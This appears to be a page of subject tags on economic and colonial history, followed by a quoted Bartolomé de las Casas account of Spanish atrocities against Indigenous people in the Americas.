Admiral Zheng, affirmative action, agricultural Revolution, Atahualpa, Ayatollah Khomeini, Bartolomé de las Casas, book value, British Empire, business cycle, Cape to Cairo, classic study, clean water, colonial rule, Columbian Exchange, computer age, David Ricardo: comparative advantage, deindustrialization, deskilling, European colonialism, Fellow of the Royal Society, financial intermediation, Francisco Pizarro, germ theory of disease, glass ceiling, high-speed rail, illegal immigration, income inequality, Index librorum prohibitorum, interchangeable parts, invention of agriculture, invention of movable type, invisible hand, Isaac Newton, it's over 9,000, James Watt: steam engine, John Harrison: Longitude, joint-stock company, Just-in-time delivery, Kenneth Arrow, land tenure, lateral thinking, Lewis Mumford, mass immigration, Mexican peso crisis / tequila crisis, MITM: man-in-the-middle, Monroe Doctrine, Murano, Venice glass, new economy, New Urbanism, North Sea oil, out of africa, passive investing, Paul Erdős, Paul Samuelson, Philip Mirowski, rent-seeking, Right to Buy, Robert Solow, Savings and loan crisis, Scramble for Africa, Simon Kuznets, South China Sea, spice trade, spinning jenny, Suez canal 1869, The Wealth of Nations by Adam Smith, trade route, transaction costs, transatlantic slave trade, Vilfredo Pareto, zero-sum game

When Columbus met his first Indians, he could not get over their trust and friendliness; to this the Spaniards, frustrated for gold, re­ turned bestialities unworthy of beasts: They came with their Horsemen well armed with Sword and Launce, making most cruel havocks and slaughters. . . . Overrunning Cities and Vil­ lages, where they spared no sex nor age; neither would their cruelty pity Women with childe, whose bellies they would rip up, taking out the Infant to hew it in pieces. They would often lay wagers who should with most dex­ terity either cleave or cut a man in the middle. . . . The children they would take by the feet and dash their innocent heads against the rocks, and when they were fallen into the water, with a strange and cruel derision they would call on them to swim. . . . They erected certains Gallowses . . . upon every one of which they would hang thirteen persons, blasphemously affirming that they did it in honour o f our Redeemer and his Apostles, and then putting fire under them, they burnt the poor wretches alive.